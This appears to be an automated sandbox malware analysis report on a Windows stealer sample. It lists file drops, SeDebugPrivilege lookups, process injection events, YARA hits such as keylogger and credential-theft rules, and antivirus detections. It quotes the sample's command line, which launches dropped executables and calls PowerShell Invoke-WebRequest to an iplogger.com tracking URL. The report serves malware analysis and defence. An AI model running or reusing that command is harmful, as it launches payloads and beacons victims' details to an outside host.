NtCreateFile Oct. 10, 2024, 10:57 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Local\Temp\iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: iCPVJT9Ww\Mw7MCq8vFe\sHVTRvuvote create_options: 96 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 4294967295 () share_access: 2 (FILE_SHARE_WRITE)	3221225530

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "QkZoHEBKmB.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
cmdline	powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\1.exe
file	C:\Users\test22\AppData\Local\Temp\2.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\1.exe
file	C:\Users\test22\AppData\Local\Temp\2.exe
file	C:\Users\test22\AppData\Local\Temp\nsiFAEB.tmp\G2DH7W.dll

Checks for the Locally Unique Identifier on the system for a suspicious privilege (11 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 10, 2024, 10:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://nsis.sf.net/NSIS_Error

Yara rule detected in process memory (50 out of 1137 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 74 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2640 resumed a thread in remote process 2704
Process injection	Process 2640 resumed a thread in remote process 2812
Process injection	Process 2640 resumed a thread in remote process 2888
Process injection	Process 2992 resumed a thread in remote process 1216
Process injection	Process 2992 resumed a thread in remote process 2108
Process injection	Process 2992 resumed a thread in remote process 2192
Process injection	Process 2504 resumed a thread in remote process 2656
Process injection	Process 2504 resumed a thread in remote process 2624
Process injection	Process 2504 resumed a thread in remote process 2380
Process injection	Process 1356 resumed a thread in remote process 2256
Process injection	Process 1356 resumed a thread in remote process 2724
Process injection	Process 1356 resumed a thread in remote process 2780
Process injection	Process 2412 resumed a thread in remote process 2952
Process injection	Process 2412 resumed a thread in remote process 2872
Process injection	Process 2412 resumed a thread in remote process 2564
Process injection	Process 2892 resumed a thread in remote process 2224
Process injection	Process 2892 resumed a thread in remote process 2056
Process injection	Process 2892 resumed a thread in remote process 2084
Process injection	Process 3052 resumed a thread in remote process 1964
Process injection	Process 3052 resumed a thread in remote process 2828
Process injection	Process 3052 resumed a thread in remote process 2748
Process injection	Process 2932 resumed a thread in remote process 884
Process injection	Process 2932 resumed a thread in remote process 2568
Process injection	Process 2932 resumed a thread in remote process 2908
Process injection	Process 2536 resumed a thread in remote process 284
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2704	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2812	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2888	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 1216	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2108	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2192	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2656	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2624	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2380	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2256	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2724	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2780	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2952	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2872	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2564	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2224	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2056	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2084	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 1964	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2828	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2748	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 884	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2568	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2908	1	0	0
NtResumeThread Oct. 10, 2024, 10:55 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 284	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Stealer.12!c
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win32.Generic.rc
ALYac	Gen:Variant.Tedy.337513
Cylance	Unsafe
VIPRE	Gen:Variant.Tedy.337513
Sangfor	Trojan.Win32.Agent.Vn8x
CrowdStrike	win/malicious_confidence_100% (W)
BitDefender	Gen:Variant.Tedy.337513
K7GW	Trojan ( 0058a1511 )
K7AntiVirus	Trojan ( 0058a1511 )
Arcabit	Trojan.Tedy.D52669
VirIT	Trojan.Win32.MSIL_Heur.D
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
Avast	Win32:Evo-gen [Trj]
ClamAV	Win.Packed.Razy-9894224-0
Kaspersky	UDS:DangerousObject.Multi.Generic
Alibaba	TrojanSpy:Win32/Stealer.c2bd5d0e
NANO-Antivirus	Trojan.Win32.Stealer.jvrgik
MicroWorld-eScan	Gen:Variant.Tedy.337513
Rising	Trojan.IPLogger/NSIS!1.C696 (CLASSIC)
Emsisoft	Trojan.Packed (A)
F-Secure	Heuristic.HEUR/AGEN.1315053
DrWeb	Trojan.Inject4.55885
Zillya	Trojan.Reline.Win32.7437
TrendMicro	TROJ_GEN.R002C0PJ824
McAfeeD	ti!A96C1C6BE687
CTX	exe.trojan.stealer
Sophos	Mal/Generic-S
FireEye	Generic.mg.16d6121d4ff8ab1f
Google	Detected
Avira	HEUR/AGEN.1338066
Antiy-AVL	Trojan/Win32.Kryptik
Kingsoft	Win32.Trojan-Spy.Stealer.gen
Microsoft	Trojan:Win32/Redline.RWZ!MTB
ViRobot	Trojan.Win.Z.Kryptik.4595781
ZoneAlarm	HEUR:Trojan-Spy.Win32.Stealer.gen
GData	Gen:Variant.Tedy.337513
Varist	W32/ABRisk.FRHA-5156
AhnLab-V3	Trojan/Win.Generic.R441806
McAfee	Artemis!16D6121D4FF8
DeepInstinct	MALICIOUS
VBA32	BScope.Trojan.Kryptik
Malwarebytes	Generic.Malware.AI.DDS
Ikarus	Trojan.Win32.Crypt
Panda	Trj/CI.A
TrendMicro-HouseCall	TROJ_GEN.R002C0PJ824

QkZoHEBKmB.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All